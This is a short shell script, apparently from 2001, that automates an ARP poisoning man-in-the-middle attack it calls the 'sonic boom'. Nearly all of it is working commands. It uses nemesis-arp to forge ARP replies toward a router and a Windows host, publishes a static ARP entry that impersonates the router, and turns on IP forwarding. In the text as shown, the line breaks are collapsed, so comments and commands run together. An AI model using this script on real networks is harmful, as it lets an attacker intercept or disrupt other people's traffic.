# Copyright (C) 2001 Kevin DePeugh and Jeff Nathan # # automatically perform the "sonic boom" on a network # # This script assumes that the router's addresses are: # IP 10.100.100.1 # MAC 0:30:19:3e:a5:0 # # This script assumes that the Windows systems's addresses are: # IP 10.100.100.69 # MAC 00:00:86:5a:d0:1c # # This script assumes that the attacker's addresses are: # IP 10.100.100.99 # MAC 00:10:a4:8f:50:6a # set firewall to allow all incoming and outgoing traffic # /sbin/ipf -Fa -f ./pass.rules sleep 1 # create/overwrite ARP cache entry for windows system on the router # nemesis-arp -S 10.100.100.69 -D 10.100.100.1 -d fxp0 -M "0:30:19:3e:a5:0" # overwrite ARP cache entry for router on the windows system # nemesis-arp -S 10.100.100.1 -D 10.100.100.69 -d fxp0 \ -H "00:10:a4:8f:50:6a" -M "00:00:86:5a:d0:1c" # overwrite the router's own ARP entry via the sonic boom # from this point forward, the router will no longer respond to ARP requests # nor will it update its ARP cache. However, ARP cache information will # still time out based upon the router's configuration # nemesis-arp -T -S 10.100.100.1 -D 10.100.100.1 -d fxp0 \ -H "0:30:19:3e:a5:0" -M "0:30:19:3e:a5:0" -h "00:10:a4:8f:50:6a" sleep 1 # delete existing ARP cache entries on the attacker's system # /usr/sbin/arp -d 10.100.100.1 /usr/sbin/arp -d 10.100.100.1 /usr/sbin/arp -d 10.100.100.69 # add static ARP cache entry with correct hardware address of router's IP so # that attack system can still deliver IP datagrams to the router via Ethernet # /usr/sbin/arp -s 10.100.100.1 0:30:19:3e:a5:0 permanent # add static ARP cache entry with attacker's hardware address and router's IP # and publish it so that ARP requests for the router's hardware address will # be answered by the attacker's system with the attacker's hardware address # /usr/sbin/arp -s 10.100.100.1 00:10:a4:8f:50:6a permanent pub sleep 1 # configure firewall on attack system to block all outbound IP/TCP/UDP thus # preventing duplicate responses # /sbin/ipf -Fa -f ./block.rules sleep 1 # turn on IP forwarding /sbin/sysctl -w net.inet.ip.forwarding=1